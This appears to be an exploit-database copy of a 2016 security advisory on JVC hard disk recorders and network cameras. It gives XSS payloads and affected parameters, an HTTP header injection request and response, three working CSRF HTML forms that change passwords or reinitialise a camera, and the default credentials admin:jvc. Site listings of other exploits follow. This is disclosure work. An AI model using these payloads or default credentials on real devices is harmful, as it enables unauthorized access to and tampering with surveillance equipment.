"JVC HDRs / Net (Multiple Cameras) - Multiple Vulnerabilities"

Author

Exploit author

Orwelllabs

Platform

Exploit platform

hardware

Release date

Exploit published date

2016-05-10

                
                    
                         Download file
                    
                
            
| | |       |
  _ \  _|\ \  \ / -_) | | |  _` |  _ \(_-<
\___/_|   \_/\_/\___|_|_|_|\__,_|_.__/___/

www.orwelllabs.com
security advisory
      olsa-2016-04-01




* Adivisory Information
+++++++++++++++++++++++
(+) Title: JVC Multiple Products Multiple Vulnerabilities
(+) Vendor: JVC Professional Video
(+) Research and Advisory: Orwelllabs
(+) Adivisory URL:
http://www.orwelllabs.com/2016/04/jvc-multiple-products-multiple.html
(+) OLSA-ID: OLSA-2016-04-01
(+) Affected Products: JVC HDR VR-809/816, Network cameras VN-C*, VN-V*,
VN-X* with firmwares 1.03 and 2.03
(+) IoT Attack Surface: Device Administrative Interface
(+) Owasp IoTTop10: I1, I2



* Overview
++++++++++
I1 - 1. Multiple Cross-site Scripting
I1 - 2. HTTP Header Injection
I1 - 3. Multiple Cross-site Request Forgery
I1 - 4. Cleartext sensitive data
I1 - 5. Weak Default Credentials/Known credentials
I2 - 6. Poorly Protected Credentials



1. Reflected Cross-site scripting
=================================
JVC Hard Disk Recorders are prone to XSS and HTTP Header Injection[2].

(+) Affected Products:
----------------------
JVC VR-809 HDR
JVC VR-816 HDR


(+) Technical Details/PoCs
--------------------------

(+) URL Trigger:
http://xxx.xxx.xxx.xxx/api/param?video.input(01).comment&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment

(+) Payload used [ *** XSS *** ]: <img src=a onerror=alert("0rwelll4bs")>
(+) affected script/path: /api/param?
(+) affected parameters (video.input.COMMENT):

+ video.input(01).comment[ *** XSS *** ]
+ video.input(02).comment[ *** XSS *** ]
+ video.input(03).comment[ *** XSS *** ]
+ video.input(04).comment[ *** XSS *** ]
+ video.input(05).comment[ *** XSS *** ]
+ video.input(06).comment[ *** XSS *** ]
+ video.input(07).comment[ *** XSS *** ]
+ video.input(08).comment[ *** XSS *** ]
+ video.input(09).comment[ *** XSS *** ]

(+) affected parameters (video.input.STATUS):

+ video.input(01).status[ *** XSS *** ]
+ video.input(02).status[ *** XSS *** ]
+ video.input(03).status[ *** XSS *** ]
+ video.input(04).status[ *** XSS *** ]
+ video.input(05).status[ *** XSS *** ]
+ video.input(06).status[ *** XSS *** ]
+ video.input(07).status[ *** XSS *** ]
+ video.input(08).status[ *** XSS *** ]
+ video.input(09).status[ *** XSS *** ]


(+) URL Trigger:
http://xxx.xxx.xxx.xxx/api/param?network.interface(01).dhcp.status[ *** XSS
***]
(+) affected parameters:
+ interface(01).dhcp.status[ *** XSS *** ]

* In fact the javascript can be triggered just requesting the '/api/param?'
directly with payload, like this:

(+) URL: http://xxx.xxx.xxx.xxx/api/param?[*** XSS *** ]


2. HTTP Header Injection
========================
The value of the "video.input(X).comment/status" request parameter is
copied into the 'X-Response' response header.
So the malicious payload submitted in the parameter generates a response
with an injected HTTP header.


> If you request the following URL with an Javascript Payload "[*** XSS
***]":

http://xxx.xxx.xxx.xxx/api/param?video.input(01).comment<img src=a
onerror=alert("XSS")>&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment

> It will gennerate the GET request bellow:

GET /api/param?video.input(01).comment<img src=a
onerror=alert("XSS")>&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment
HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/
Cookie: vrtypename=Hard%20Disk%20Recorder; vrmodelname=0rw3|||4bs
Authorization: Basic YWRtaW46anZj
Connection: keep-alive

> And we'll get the response from the server:

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 564
X-Response: video.input(01).comment<img src=a
onerror=alert("XSS")>&video.input(02).comment&video.input(03).comment&video.input(04).comment&video.input(05).comment&video.input(06).comment&video.input(07).comment&video.input(08).comment&video.input(09).comment
Cache-control: no-cache
Pragma: no-cache
Expires: Thu, 05 May 2016 14:20:45 GMT
Server: JVC VR-809/816 API Server/1.0.0
Date: Thu, 05 May 2016 14:20:45 GMT

The javascript payload will be inject in X-Response response Header field


3. Multiple Cross-site Request Forgery
======================================
Multiple products from JVC are prone to CSRF.

(+) Affected Products:
----------------------
The following products with firmware versions 1.03, 2.03 and early:

VN-C2WU
VN-C3U
VN-C1U
VN-C2U
VN-C3WU
VN-A1U
VN-C10U
VN-C11U
VN-C655U
VN-C625U
VN-C205U
VN-C215V4U
VN-C215VP4U
VN-V686U
VN-V686WPU
VN-V25U
VN-V26U
VN-X35U
VN-V685U
VN-V686WPBU
VN-X235VPU
VN-V225VPU
VN-X235U
VN-V225U
VN-V17U
VN-V217U
VN-V217VPU
VN-H157WPU
VN-T16U
VN-T216VPRU


(+) Technical Details/PoCs
--------------------------

> CSRF: to change 'admin' password to 'sm!thW'

<html>
 <!-- Orwelllabs - JVC NetCams CSRF PoC -->
  <body>
    <form action="http://xxx.xxx.xxx.xxx/cgi-bin/c20setup.cgi"
method="POST">
      <input type="hidden" name="c20loadhtml"
value="c20systempassword&#46;html" />
      <input type="hidden" name="usermode" value="admin" />
      <input type="hidden" name="newpassword" value="sm!thW" />
      <input type="hidden" name="new2password" value="sm!thW" />
      <input type="hidden" name="ok" value="OK" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


> CSRF: to set 'user' password to "w!nst0nSm!th"

<html>
 <!-- Orwelllabs - JVC NetCams CSRF PoC -->
  <body>
    <form action="http://xxx.xxx.xxx.xxx/cgi-bin/c20setup.cgi"
method="POST">
      <input type="hidden" name="c20loadhtml"
value="c20systempassword&#46;html" />
      <input type="hidden" name="usermode" value="user" />
      <input type="hidden" name="newpassword" value="w!nst0nSm!th" />
      <input type="hidden" name="new2password" value="w!nst0nSm!th" />
      <input type="hidden" name="ok" value="OK" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


> CSRF: to reinitialize the cam

<html>
  <!-- Orwelllabs - JVC NetCams CSRF PoC -->
  <body>
    <form action="http://xxx.xxx.xxx.xxx/cgi-bin/c20setup.cgi"
method="POST">
      <input type="hidden" name="c20loadhtml"
value="c20systemmainte&#46;html" />
      <input type="hidden" name="init" value="Initialize" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


4. Cleartext sensitive data
===========================
By default everything is trasmite over HTTP, including credentials.


5. Weak Default Credentials/Known credentials
=============================================
The vast maiority of these devices remain with default credential admin:jvc
or admin:[model-of-camera] and costumers are not obligated to change it
during initial setup.


6. Poorly Protected Credentials
===============================
An attacker in the same network is able to capture and decode the
credentials as they aren't trasmited over HTTPs and are protected using
just
Base64 with Basic Authorization.

> Authentication process

GET /cgi-bin/x35viewing.cgi?x35ptzviewer.html HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: X35JPEGVIEWSIZE=VGA; X35JPEGDISP=OFF-OFF-OFF-OFF-1;
X35JPEGSTREAM=HTTP-5-225.0.1.1-49152; X35JPEGHTTPPORT=80;
X35FOLDERNAME=VN-X35; X35MPEG4VIEWSIZE=VGA; X35MPEG4DISP=OFF-OFF-OFF-1;
X35MPEG4STREAM=HTTP-225.0.2.1-59152; X35MPEG4HTTPPORT=80;
X35AUDIO=OFF-HTTP-225.0.3.1-39152-49298-80; X35PTZCTRL=w!nst0nSm!th
Connection: keep-alive
Authorization: Basic YWRtaW46anZj


*Once this is related with a old bad design is possible that a large range
of products are affected by reported issues.


Timeline
++++++++
2016-04-20: First attemp to contact Vendor
2016-04-22: Vendor asks for products affected/details sent
2016-04-26: Ask vendor for any news about the issues reported
2016-05-09: Until this date no response
2016-05-10: Full disclosure


Legal Notices
+++++++++++++
The information contained within this advisory and in any other published
by our lab is supplied "as-is" with no warranties or guarantees of fitness
of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.


About Orwelllabs
++++++++++++++++
Orwelllabs is an independent security research lab interested in IoT, what
means embedded devices and all its components like web applications,
network, mobile applications and all surface areas prone to attack.
Orwelllabs aims to study, learn and produce some intelligence around this
vast and confusing big picture called smart cities. We have special
appreciation for devices designed to provide security to these highly
technological cities, also known as Iost (Internet of Security Things ).



-----BEGIN PGP PUBLIC KEY BLOCK-----
mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-11-30	"Intelbras Router RF 301K 1.1.2 - Authentication Bypass"	webapps	hardware	"Kaio Amaral"
2020-11-30	"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure"	webapps	hardware	"Zagros Bingol"
2020-11-27	"Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution"	webapps	hardware	"Emre SUREN"
2020-11-24	"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)"	webapps	hardware	maj0rmil4d
2020-11-23	"TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass"	webapps	hardware	malwrforensics
2020-11-19	"Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification"	webapps	hardware	"Ricardo Longatto"
2020-11-19	"Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure"	remote	hardware	"Nitesh Surana"
2020-11-16	"Cisco 7937G - DoS/Privilege Escalation"	remote	hardware	"Cody Martin"
2020-11-13	"ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)"	webapps	hardware	b1ack0wl
2020-11-13	"Citrix ADC NetScaler - Local File Inclusion (Metasploit)"	webapps	hardware	"RAMELLA Sebastien"

Release Date	Title	Type	Platform	Author
2017-03-17	"AXIS (Multiple Products) - Cross-Site Request Forgery"	webapps	hardware	Orwelllabs
2017-03-17	"AXIS Communications - Cross-Site Scripting / Content Injection"	webapps	hardware	Orwelllabs
2016-07-29	"AXIS (Multiple Products) - 'devtools ' (Authenticated) Remote Command Execution"	webapps	linux	Orwelllabs
2016-05-10	"JVC HDRs / Net (Multiple Cameras) - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2016-04-29	"Merit Lilin IP Cameras - Multiple Vulnerabilities"	webapps	cgi	Orwelllabs
2016-04-14	"Brickcom Corporation Network Cameras - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2016-04-11	"Axis Network Cameras - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2016-04-07	"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2016-04-04	"PQI Air Pen Express 6W51-0000R2/6W51-0000R2XXX - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2015-09-20	"ADH-Web Server IP-Cameras - Multiple Vulnerabilities"	webapps	hardware	Orwelllabs
2015-09-02	"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass"	webapps	hardware	Orwelllabs

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"JVC HDRs / Net (Multiple Cameras) - Multiple Vulnerabilities"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.